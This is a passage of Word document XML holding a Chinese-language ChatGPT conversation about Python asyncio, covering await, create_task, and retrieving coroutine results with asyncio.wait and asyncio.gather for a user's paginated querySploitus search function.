    <w:p w14:paraId="0399D6FC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD93253" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字则用于在一个协程中等待另一个协程完成。当你写下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await task1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，当前的协程会暂停执行，等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所代表的协程完成。在此期间，事件循环可以切换到其他的协程去执行。一旦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成，事件循环会切换回来，恢复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await task1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C7D83" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F17B884" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.create_task() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一起使用，可以实现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的并发编程，让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作（比如网络请求、数据库查询）的同时，执行其他的任务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0EAD6B" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1FB94F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那如果我传入的携程函数有返回值，怎么获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E150AED" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68511045" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08EA0FAC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你的协程函数有返回值，那么你可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时获取到这个值。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象在被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，会返回其代表的协程的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1667DC7B" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2982077E" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面是一个示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C663813" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78821FCB" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330AA85B" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE97D68" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7CCA29" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10645666" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def foo():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74532FD0" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    await asyncio.sleep(1)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365E3793" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    return 'hello'  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程的返回值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5786C35D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6801B321" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2441EBDB" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    task = asyncio.create_task(foo())  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1001F57F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await task  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程完成，并获取其返回值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3633C0CF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(result)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'hello'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A789D76" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003DB706" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA31E18" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC67269" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个示例中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">foo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个协程函数，它在等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒后返回一个字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'hello'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">main() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是另一个协程函数，它使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.create_task() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程，并使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取其返回值。最后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.run(main()) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1FF963" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAF439A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC12F5A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574289AD" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>loop.run_until_complete(asyncio.wait(task_list))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种方式写的代码如何获取携程的返回值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA8A6F6" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A018A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB9BA43" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.wait(tasks)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tuple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包含两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的对象，一个包含完成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Futures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，另一个包含未完成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Futures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。完成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Futures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是我们关注的，可以通过调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>result()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法获取他们的返回值。在你的例子中，你可以这样操作：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2B7FD7" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D463B3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6901A8F6" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FBBC486" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616F3CBE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037A2CCE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>done, _ = loop.run_until_complete(asyncio.wait(task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01157DE8" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308BE10F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>results = [task.result() for task in done]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0145C3A3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6EF242" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在上面的代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它包含所有完成的任务。然后，我们使用列表解析（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list comprehension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取所有任务的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7750AC59" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF0C259" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，你还可以用更简单的方式来获取任务的结果，那就是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.gather(*tasks)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它将返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的结果是所有任务的结果的一个列表。如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5CBF73" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60298700" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342CFE51" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2531CF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F49782" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006530BF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>results = loop.run_until_complete(asyncio.gather(*task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450BACAF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BEC903D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>results</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个列表，包含了所有任务的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D665424" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B6DD25" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>task_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
